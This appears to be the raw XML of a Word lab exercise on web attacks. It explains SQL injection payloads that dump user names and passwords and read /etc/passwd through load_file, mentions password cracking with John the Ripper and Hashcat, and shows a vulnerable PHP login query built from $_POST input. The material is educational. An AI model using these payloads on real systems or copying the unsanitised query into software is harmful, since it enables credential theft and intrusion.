          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="9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and     </w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="9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1=0     </w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="8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union     </w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="8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 xml:space="preserve">select     </w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>null,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060FBEBE" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="836"/>
        </w:tabs>
        <w:spacing w:line="275" w:lineRule="exact"/>
        <w:ind w:left="835"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(first_name,0x0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>a,last</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_name,0x0a,user,0x0a,password)</w:t>
      </w:r>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="1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from</w:t>
      </w:r>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="2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users</w:t>
      </w:r>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="3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#'</w:t>
      </w:r>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-1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displays</w:t>
      </w:r>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-57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the</w:t>
      </w:r>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>content of user-related columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25154096" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="836"/>
        </w:tabs>
        <w:spacing w:line="275" w:lineRule="exact"/>
        <w:ind w:left="835"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBEFD6B" w14:textId="74FCE9B7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T</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">his SQL injection payload leverages the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) function to concatenate the values of user-related columns (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>first_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, user, password) in the 'users' table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E76E65C" w14:textId="7E39E94A" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="836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D37FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EB7A862" wp14:editId="1B2E84BB">
            <wp:extent cx="4434840" cy="1923306"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
            <wp:docPr id="67296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7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923" cy="19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7359" w14:textId="65FAABF1" w:rsidR="00230D57" w:rsidRPr="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="836"/>
          <w:tab w:val="left" w:pos="949"/>
          <w:tab w:val="left" w:pos="1711"/>
          <w:tab w:val="left" w:pos="2128"/>
          <w:tab w:val="left" w:pos="2678"/>
          <w:tab w:val="left" w:pos="3707"/>
          <w:tab w:val="left" w:pos="4151"/>
          <w:tab w:val="left" w:pos="4700"/>
          <w:tab w:val="left" w:pos="5892"/>
          <w:tab w:val="left" w:pos="6400"/>
          <w:tab w:val="left" w:pos="7017"/>
          <w:tab w:val="left" w:pos="7676"/>
          <w:tab w:val="left" w:pos="8478"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="835" w:right="111"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>What</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>'%</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>1=0</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>union</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-57"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>load_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/passwd'), null #'</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in the</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>context of</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>extracting storage</w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>passwords?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389AA73E" w14:textId="6FFA19B3" w:rsidR="00230D57" w:rsidRPr="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="836"/>
          <w:tab w:val="left" w:pos="949"/>
          <w:tab w:val="left" w:pos="1711"/>
          <w:tab w:val="left" w:pos="2128"/>
          <w:tab w:val="left" w:pos="2678"/>
          <w:tab w:val="left" w:pos="3707"/>
          <w:tab w:val="left" w:pos="4151"/>
          <w:tab w:val="left" w:pos="4700"/>
          <w:tab w:val="left" w:pos="5892"/>
          <w:tab w:val="left" w:pos="6400"/>
          <w:tab w:val="left" w:pos="7017"/>
          <w:tab w:val="left" w:pos="7676"/>
          <w:tab w:val="left" w:pos="8478"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="835" w:right="111" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>By injecting this payload into the vulnerable application, an attacker can attempt to extract sensitive system information stored in files like '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/passwd'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796D972D" w14:textId="1A1E1BF3" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="836"/>
          <w:tab w:val="left" w:pos="949"/>
          <w:tab w:val="left" w:pos="1711"/>
          <w:tab w:val="left" w:pos="2128"/>
          <w:tab w:val="left" w:pos="2678"/>
          <w:tab w:val="left" w:pos="3707"/>
          <w:tab w:val="left" w:pos="4151"/>
          <w:tab w:val="left" w:pos="4700"/>
          <w:tab w:val="left" w:pos="5892"/>
          <w:tab w:val="left" w:pos="6400"/>
          <w:tab w:val="left" w:pos="7017"/>
          <w:tab w:val="left" w:pos="7676"/>
          <w:tab w:val="left" w:pos="8478"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="835" w:right="111" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1022FF43" wp14:editId="21CE5361">
            <wp:extent cx="3817620" cy="3714734"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="110971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16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520" cy="37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0059" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="836"/>
          <w:tab w:val="left" w:pos="949"/>
          <w:tab w:val="left" w:pos="1711"/>
          <w:tab w:val="left" w:pos="2128"/>
          <w:tab w:val="left" w:pos="2678"/>
          <w:tab w:val="left" w:pos="3707"/>
          <w:tab w:val="left" w:pos="4151"/>
          <w:tab w:val="left" w:pos="4700"/>
          <w:tab w:val="left" w:pos="5892"/>
          <w:tab w:val="left" w:pos="6400"/>
          <w:tab w:val="left" w:pos="7017"/>
          <w:tab w:val="left" w:pos="7676"/>
          <w:tab w:val="left" w:pos="8478"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="835" w:right="111" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2B0720" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="949"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="237"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Compare</w:t>
      </w:r>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="28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the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usage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of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John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the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Ripper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and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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="31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in</w:t>
      </w:r>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="30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the</w:t>
      </w:r>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="34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context</w:t>
      </w:r>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="31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of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF023FF" w14:textId="154B0C7E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  <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>decrypting</w:t>
      </w:r>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-57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hashed</w:t>
      </w:r>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-1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passwords. How do they</w:t>
      </w:r>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>differ in their approaches?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0209A91A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396FB4EB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78DD7EFA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68FD9549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4EB8B8DB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3B263882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33029422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</w:p>
    <w:p w14:paraId="79457930" w14:textId="3E6794B9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EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>JOHN THE RIPPER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29767F7A" w14:textId="5BE8B59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  <w:r w:rsidRPr="00BA45C2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="098B4F7B" wp14:editId="701397AB">
            <wp:extent cx="5731510" cy="2350770"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="19650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21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C3F3" w14:textId="6DAC272D" w:rsidR="00230D57" w:rsidRP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color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HASHCAT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B21343" w14:textId="1899AA5D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  <w:r w:rsidRPr="00BA45C2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A296E07" wp14:editId="4FCA48F0">
            <wp:extent cx="5731510" cy="4047490"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="197082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9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F324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</w:p>
    <w:p w14:paraId="5EAF74FF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</w:p>
    <w:p w14:paraId="10BC07DF" w14:textId="77777777" w:rsidR="00230D57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</w:p>
    <w:p w14:paraId="7E325188" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="89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(SQLi)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6EDABF" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="186"/>
        <w:ind w:left="120" w:right="117"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>injection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hackers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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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database-driven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>applications.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involves</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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altering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repudiation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spoofing identity, and more. Consider a straightforward scenario with a web application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>featuring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fields.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PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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might appear as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CAB378" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7953D397" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:ind w:left="120"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FE92F42" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:ind w:left="120"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$query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"SELECT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*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FROM users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WHERE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username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'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"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.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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$_POST['username'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>]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.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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"'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC6C3ED" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="120"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
